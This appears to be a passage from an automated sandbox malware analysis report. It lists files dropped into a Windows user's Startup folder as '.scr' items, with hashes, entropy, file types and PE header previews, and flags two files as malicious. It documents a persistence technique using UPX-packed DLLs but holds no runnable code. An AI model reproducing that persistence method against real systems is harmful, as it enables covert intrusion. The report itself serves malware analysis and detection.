                                                                                                    SHA-256:22E148FDF281F3A7DBD3EBB13F8F637B7791173DBB472F1B2FA3D954D46993AD
                                                                                                    SHA-512:740B487546FECF7AE2304A00F1017BEEB13E229371A92E7EED31779701B96F63FBE2E3F51057447FC8298F2B932466358BF2A3BB835E7BACF0E2C60A0627C5AC
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d....B.f.........." .....`..........Pa....................................................`.........................................Lr..0....p..\....p....... ..$...........|s......................................Pm..8...........................................UPX0....................................UPX1.....`.......`..................@....rsrc........p.......d..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):640000
                                                                                                    Entropy (8bit):7.99870484556712
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:TIahn0k2jt5j5hjcFCGQNKQ8J2NWqZxjYDHJrX2cQ6GFlBg+cogRfG9jU:z0fX9pcXO/NWixjYrJdCHqVVsZU
                                                                                                    MD5:B3930E1BFD96489CC991B5A06A8F6407
                                                                                                    SHA1:21591BD093D9318F7D4EC569B34CA0BB785551AB
                                                                                                    SHA-256:DCE41C5CD6647B3F4EA933E7B6A325684B61B96202A079E98DB06E20DAB3F5B7
                                                                                                    SHA-512:E434309E84CA50C1BF70524D84C1A3C90054E308A41ECC07E0BB09FE1EECFB87595CE8028BBADD1AC76545F8F1037BE354EB7957FD3EA0F8CB60B9F455EEFBB8
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d....B.f.........." .............`.......p...................................@............`.........................................L2..h....0..\....0.......................3.......................................*..8...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15872
                                                                                                    Entropy (8bit):7.366227235042746
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:PGBfc1QlWR3bEsLMf6Ufn10euzGZa7gJXN1m:PGkQN6awKpd1m
                                                                                                    MD5:89ED1AD3B5457EDF07A23AAE74B56595
                                                                                                    SHA1:3D4389DCB2D47EA4F991FB82AA9D62914A88F0B9
                                                                                                    SHA-256:F98056C564B2B353C97C6657F1AC55BE86A97E84A036718E8702ADACCD238643
                                                                                                    SHA-512:60695105017822B8FD0E4F57257113836CE21AB515F12447F95696AFCD62A86F2E46496C0F53A5C4AB0AAA9997802DD690BD1BE0F3365A21CDA52ABC77834370
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@..........@.....................................................`.........................................L...0.......\...........................|.......................................@...8...........................................UPX0....................................UPX1.....@.......6..................@....rsrc................:..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):7.764205395498449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yYWTbll1RIaPUAc5BjOxy2VANd9N/Q6/HgnhkX4ts6HGZa7gJX7AgM:zablfRBPUAc3j32VANdTQ6fzX4twprA
                                                                                                    MD5:057EAAFC435CFA276644E53A2AE1B8BF
                                                                                                    SHA1:594190621E521826A13C0AE33EB41A78F55E687E
                                                                                                    SHA-256:66C3FEA141B1B9FEF04A54CB4452B36D4CB9A201F52173E684301164993E99A8
                                                                                                    SHA-512:47DEFE33532228601D63D6577D51BDE6F362C6510C752717F8632B6C20B536F74D13A55D8CA8B0D8DF6D2A00B084D34086D1E56C9ED0152CB2AA6DBF71C3071F
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d....B.f.........." .....p.......@......P................................................`.........................................L...h.......\............`..l......................................................8...........................................UPX0.....@..............................UPX1.....p...P...h..................@....rsrc................l..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9216
                                                                                                    Entropy (8bit):6.7044520903294025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:p51jwkl3nSW/TftRVw61csNba5NkYj273QJXpHj:p5CkwWbft0rsc5NZa7gJXJ
                                                                                                    MD5:6583A780CA8E489DD8FFE2CB5440646D
                                                                                                    SHA1:ADE364CF1D5C42D390CFC19954AF6AE1C2A34534
                                                                                                    SHA-256:5D7C6EA038B25C47442E2DD22353E85FFAF1E2F35F3186097396BEFEC9B69067
                                                                                                    SHA-512:DAE0DA68DD9A16EF02EB9F369F7BA9F482691CBD0A870AC893736E01C5B401137B861959451D8C7F6792445A7D98E3B7EEE4EC1F116549AA09E2AA93CD516C86
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d....B.f.........." ..... .......p..p.....................................................`.............................................|...................@..............|.......................................p...8...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................ ..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9216
                                                                                                    Entropy (8bit):6.701511658704808
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0AhKeeuBxm0jMuCicColTjCBhXkYj273QJXEHj:0AhxpgTSBhXZa7gJXw
                                                                                                    MD5:6E1535927EA0388C536F2D3ACF9E520A
                                                                                                    SHA1:E42176C263887054F04B8FEE7FD3F6B5989EAC6C
                                                                                                    SHA-256:E30237D613923C5E47BB12BEFEB6FB835B13A4B8E0853A2569A3F61B750302E5
                                                                                                    SHA-512:61859741A6C6957CED56EAED2567D274B2F39479FB1C99F985730A1ED1A8C394BCC49F1D513111354BD1DC092902FEB1DEAD13DA3698459CA88F87E42A9B1DB8
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d....B.f.........." ..... .......p..p.....................................................`.............................................t...................@..............t.......................................p...8...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................ ..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):761344
                                                                                                    Entropy (8bit):7.998137449024628
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:ko0ZsydSvIV69l1Du2eNfDJr2QbDj/ju+F3hOyjelmsmWrv65GHXWmQgRte7dlaR:kpZsydk59zi2e5wQbP/3Cyjsm0vAskE4
                                                                                                    MD5:3633E0248F6F931A0C523C1754696122
                                                                                                    SHA1:92274CD119B8879D7CC01C0B22EB1CE489EE14C9
                                                                                                    SHA-256:64BF1FFA7B1DBAD841E0949B2FA9D3760FF43941B1D33D2D605DC4EE197BA033
                                                                                                    SHA-512:B266357D293295C1D46E99C21BC8197BC9D17F40311162553128EA85F0B8416DC8EDA9083FD60E4BDC848E532E8ACD11329E992D2A5D5EC0A9FCC7758CB21480
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6...XK..XK..XK...K..XK..YJ..XK...K..XK..[J..XK..\J..XK..]J..XK..YJ..XK..YJ..XK..YK..XK..XK..XK..\J..XK..PJ..XK..XJ..XK...K..XK..ZJ..XKRich..XK........PE..d......g.........." ...).............t$.......................................$...........`...........................................$.`....$.......$...... #............. .$. .............................$.(....$.@...........................................UPX0....................................UPX1................................@....rsrc.........$.....................@......................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98816
                                                                                                    Entropy (8bit):7.951335483683929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:uUp/4AvpqEz/ycNBYX040UM2ufs6hysaz9qPIUvz9OD7PtjMRnrVO:7p/jvppLycNekJB2uxyssWI8kKRM
                                                                                                    MD5:07B21031D5F61DC6BB5A23EEC8ED7AFA
                                                                                                    SHA1:F6C60DC8C36387D0714DBE690375F68A210314B9
                                                                                                    SHA-256:482DA69723AFF48D763CE83F4F3F5CE67913A41982BD1BC7608152E868679CA1
                                                                                                    SHA-512:884A24B2F9D498ED839818F372CC1350E8D69F733FFC9D762D22142544E001BFD5CBBB44387DDA7401F781868F96DF2FBFE9172AC885D40058EB9D3E99A2685D
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.3_.r]..r]..r]......r]...\..r]...^..r]...Y..r]...X..r].P.\..r].S.\..r]..r\.hr].P.U..r].P.]..r].P....r].P._..r].Rich.r].........PE..d......g.........." ...)............`Y....................................................`.........................................|t..h....p.......p.........../...........t......................................`e..@...........................................UPX0....................................UPX1.............x..................@....rsrc........p.......|..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13312
                                                                                                    Entropy (8bit):7.268456642905388
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:l79SXKiik04i3p5Ll0iT4hK0G2J2nnp+jkYj273QJX7HaPmg:lRS/Qh0is00GU2nnp+jZa7gJX2Pm
                                                                                                    MD5:4031DA48FFAAF3FF8082324CFAB65B38
                                                                                                    SHA1:3FEECCECA82CA8433A9F5D9495EF1FD25BA1FEA9
                                                                                                    SHA-256:113BDB5BF34B4487C6E1416C618D7DF1156EAF008EDFFB57CC1CCE5769F68600
                                                                                                    SHA-512:DF6C432F482333AD38F5EC039DD7415340BD33B12E158F75A4CAEA9C47416C98F8E85783204874E5049E960E6F25F11CA693B1463A400C17D82F4C666BBDF1A5
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......rJ.]6+..6+..6+..?S..2+..&...4+..}S..4+..&...5+..&...>+..&...:+..~...5+..6+...+..~...7+..~...7+..~.i.7+..~...7+..Rich6+..................PE..d......g.........." ...).0..........`.....................................................`.............................................h.......................h...................................................`...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):6.915668228186661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:x8z3beKTrVeko1VATfR4D+IPA7Y4pXkYj273QJXbHaP55KdrX1:xG3beUrLo1eTfRJYOXZa7gJXq55KdrX
                                                                                                    MD5:534058D03A7D553FA87AC656C1E7825B
                                                                                                    SHA1:C02E1F182EED55289282B92FF8E5BAF02DC19FE9
                                                                                                    SHA-256:DF9848AA23AC86B97DC7EE07D5CE70C60042919EE388D94AE87D014C60E0A734
                                                                                                    SHA-512:1DABBB242D9A7EB2F213366C5F3B7B192AB5666F9F54C7C6DF335004BC8A9731F2256D82DD519A45E47F04F88152127BA801DE9BBCF68A85DF0D360120FEE117
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>D.rmD.rmD.rmM..mN.rmTislF.rmTiqlG.rmTivlL.rmTiwlH.rm.hslF.rm..slA.rmD.sm|.rm.hzlF.rm.hrlE.rm.h.mE.rm.hplE.rmRichD.rm................PE..d......g.........." ...).0................................................................`.............................................d....................`..............,...........................................@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc................*..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179712
                                                                                                    Entropy (8bit):7.984610367985582
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:eTeuVm4HqVAdJVl9J7U9zKeM7ej7D3/f7j27XNzL5thmlUjZcSjQRG3/AcE:ejmkVzVX1UIf7ezmXNP3hgcE
                                                                                                    MD5:FDCEC1A545C513F31A21CEBA099DC104
                                                                                                    SHA1:8EDF6D6BE51E5E04E790F7129A3AC622970838EA
                                                                                                    SHA-256:20ADC042F5BF294EF6A8B563CB72191E607C6D45FBA8A5E9F56B064D68134D6D
                                                                                                    SHA-512:09FA04F282826EBD4AED4AEAACB9D9CB2FDEEE36D8C897F44CC43DCE3913C752D226C2C8B901FA0D6DA60C7A3F2E83E7207CDA123880D530BE1C020F0FC033E0
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rr.Wrr.Wrr.W{..Wxr.Wb..Vpr.W9..Vpr.Wb..Vvr.Wb..Vzr.Wb..V.r.W:..Vqr.Wrr.W*r.W:..V%r.W:..Vsr.W:..Vsr.W:.cWsr.W:..Vsr.WRichrr.W........PE..d......g.........." ...)............0.... ................................................`.........................................x...\....................P...;..................................................0...@...........................................UPX0....................................UPX1......... ......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):119192
                                                                                                    Entropy (8bit):6.6016214745004635
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                    MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                    SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                    SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                    SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49528
                                                                                                    Entropy (8bit):6.662491747506177
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                    MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                    SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                    SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                    SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38680
                                                                                                    Entropy (8bit):7.71307535968844
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ejYeBNiQHu2NI1tp7PZ8bSpwgI1On5C5YiSyvRhAMxkEh3:u1utB6FgI1On5g7SyPxN3
                                                                                                    MD5:D9F56D51D32BCBADE2D954A9427337DC
                                                                                                    SHA1:D0E5CEE77D5038193580335E3271BB5F1FB6BFC4
                                                                                                    SHA-256:1B6C23B6F235AD58E4062B1DC4CE2C36F031F1469BF9E60C11E07603CA4656E3
                                                                                                    SHA-512:FC18968A319C11B2D9F20A376B93CC74503139506B1C9F9EE3DD226EDC1BA753CAD85C20368E162C14D26CF2F75F70AE7E82B2B9881088235F5EACA66E8DAD66
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7_[.V1..V1..V1......V1.5.0..V1.5.2..V1.5.5..V1.5.4..V1...0..V1...0..V1..V0.qV1...<..V1...1..V1......V1...3..V1.Rich.V1.........................PE..d.....f.........." ...(.`..........P:.......................................`............`..........................................Z..P....Y..P....P......................D[......................................PF..@...........................................UPX0....................................UPX1.....`.......X..................@....rsrc........P.......\..............@..............................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49944
                                                                                                    Entropy (8bit):7.7958251477250755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:wA0qhtL6ugh0BoGmZ0zlTUjZomYtgHQmchmzmrCWJ7+pj0I1CV50e5YiSyvaPAM+:wAX76ZKBT+jjvQ+a7i0I1CV597Sy4x+R
                                                                                                    MD5:9DA23EB807A43A954D40048B53A98E6F
                                                                                                    SHA1:E639BD9A27409FC72F36B4EC3383EEECDACB9DC5
                                                                                                    SHA-256:02D0D3C0163F69A7E6713742AB98E73321C5298976089FE9A03B6D91D3293EBB
                                                                                                    SHA-512:C8D164C8D4722DCD04F13AA11307FDDD655E73FD03B15C8056B34252BCE925CA679B48032313B8587369500D03574213DA20E513C3B4C155099A84DE9AC0BBA8
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(............Pu....................................................`.............................................H....................0..D..................................................P...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73216
                                                                                                    Entropy (8bit):7.9153952908203715
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:FYKYjVhOKr5WNqYZbeKaMoxrZQmAQqdtXEb53a/Tw:HYxEkW91O/mLQqdOl
                                                                                                    MD5:27004B1F01511FD6743EE5535DE8F570
                                                                                                    SHA1:B97BAA60D6C335670B8A923FA7E6411C8E602E55
                                                                                                    SHA-256:D2D3E9D9E5855A003E3D8C7502A9814191CF2B77B99BA67777AC170440DFDCCF
                                                                                                    SHA-512:BDCD7A9B9BEA5A16186D1A4E097253008D5ECD37A8D8652EC21B034ABAFBC7E5FF9CA838C5C4CB5618D87B1ACEDA09E920878C403ABAFAFA867E2D679D4D98D4
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......a..#%p.p%p.p%p.p,..p)p.p5.q'p.p5.zp!p.p5.q!p.p5.q-p.p5.q)p.pn..q!p.p6.q&p.p%p.p.p.pm..q!p.p,..p$p.pm..q$p.pm.xp$p.pm..q$p.pRich%p.p........................PE..d...W..f.........." ...). .......@...U...P................................................`..........................................s..l....p.......p..........T...........ht.......................................a..@...........................................UPX0.....@..............................UPX1..... ...P......................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60696
                                                                                                    Entropy (8bit):7.837857216725838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:CGd2xRPNLaGFQFjd9MuC8Hj0Lm3Uqy7OI1LPZV7SyVx1w5:5MxVhFyjd9MSmCxyKI1LPZV85
                                                                                                    MD5:78F5225E986641EAEBFE2BEF27865603
                                                                                                    SHA1:118AC80FDF764F5BFBAAD2D803420087B854817D
                                                                                                    SHA-256:AE55AD9AD1F4CBC398CD0C87556F1F263505CDE025C7C7F2C43CE4AE818EB183
                                                                                                    SHA-512:70E18EA660120D60D6BFA17883C2ACED276AA858C5DA4DCA1E1D56203891D996DA4F349596C911CB16497DB81B42AF4AD85E473C3E80F8932557D967C9DAD0E4
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(.....................................................P............`.........................................HL.......I.......@.......................L.......................................:..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):109848
                                                                                                    Entropy (8bit):7.94056822883411
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:CcS+IIb1vd3BENABrkfqWTpjXTZtMI1Oq37jY:CcLIIBvdRFmvFVtF7k
                                                                                                    MD5:C67548FEC576C79AA4C7D829EBBCB8FD
                                                                                                    SHA1:3C1DD3DAF407257DED9717DADCF017FDD8A2C07C
                                                                                                    SHA-256:31C2C5200F59969C7078A5A913067DFCDF326CB0D43754E38893239774286FAB
                                                                                                    SHA-512:696D76F6BAF739AA2A0D1D057DF6D3F8CBA1008C0528C8060BB3808A775393BF5E61578154E0D1BD0F3162195B108FBE51DAF005D29D368447B5C8FE844A338B
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.p...................................................@............`..........................................<..P....9.......0...........&...........=.......................................*..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........0.......p..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61208
                                                                                                    Entropy (8bit):7.86727192150037
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:GeDPQ41VvTRAEuArVwRmREIYMJSTCLI16fpR7SyMx2I:zVvTRduAaRxIYMpI16fpR8
                                                                                                    MD5:22FC5BE528D33809CBB192B065CBBB05
                                                                                                    SHA1:A15379C180F7FD2970EB37DDA69F1961DF4BBFC8
                                                                                                    SHA-256:8987B547D08C762FA665E28636F14D205DBCD3E599FAD0BEAF7607EF4C3477A8
                                                                                                    SHA-512:B0A9C62F962E0C2A7D7F37F63F4B39EB64FE884266D88990343CFBBB145D3CFA76332CA6F996A31F912FECC448173ACFB08792A22940779403CC99216D699F1C
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.0...^K..^K..^K...K..^K.r_J..^K.r]J..^K.rZJ..^K.r[J..^K.u_J..^KO._J..^K.._K..^K.uSJ..^K.u^J..^K.u.K..^K.u\J..^KRich..^K................PE..d.....f.........." ...(.........p...".......................................@............`.........................................H;..X....9.......0.......................;..........................................@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36632
                                                                                                    Entropy (8bit):7.676219125869195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:qUJsxZoP6y3dGOWm6UZBtVupFD/I1OIcK5YiSyvLGAMxkEu:/SjOWHKBteD/I1OIcI7SyT0xq
                                                                                                    MD5:121F21E4C072B1307EC96E26DBB54F48
                                                                                                    SHA1:FD7FFEB22377DB68BD6ABCE8EA526AFA14FAAD0F
                                                                                                    SHA-256:8DAC9AA352BFCB960501682D412A9EEEBEA5D1CDDE3771BA9B70A0AE2E08E883
                                                                                                    SHA-512:BEC606D0B9C4CABC263A4EDA3B8CD403E2486A4E3369FE99117386C4D1969248C54D762B465AB5BDF87FDCC7A08BF90AA873064C65063DB8CD4DC437E7E1E6C5
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88344
                                                                                                    Entropy (8bit):7.925570957709966
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:PZMIb+tRn8VHPoUBL9ZEL7qzf7+pW4AHjI1xhTkLtQtI1Z1i17SyQxw:mWgRsHPoUVwqzf7+mHjWxNsII1Z1i1b
                                                                                                    MD5:24A598B2CAA17CAEE2E24D2BB97B445D
                                                                                                    SHA1:262F07406E170284FEA0C1E41093BFE1C4A25EAB
                                                                                                    SHA-256:AF4AE25B17C7CF23D06E1F37FDEFE903A840073266D4314E410A4ACEC2AF6270
                                                                                                    SHA-512:7BDF0A599C488436C118523A67AB154A37FFC5AAB0ECEC95C463BD068D1121B197C0EBB91DC7DB3CF2A3DB913ABAFFD0A60AEDB373C0E670C63CD8D85F716F3A
                                                                                                    Malicious:false
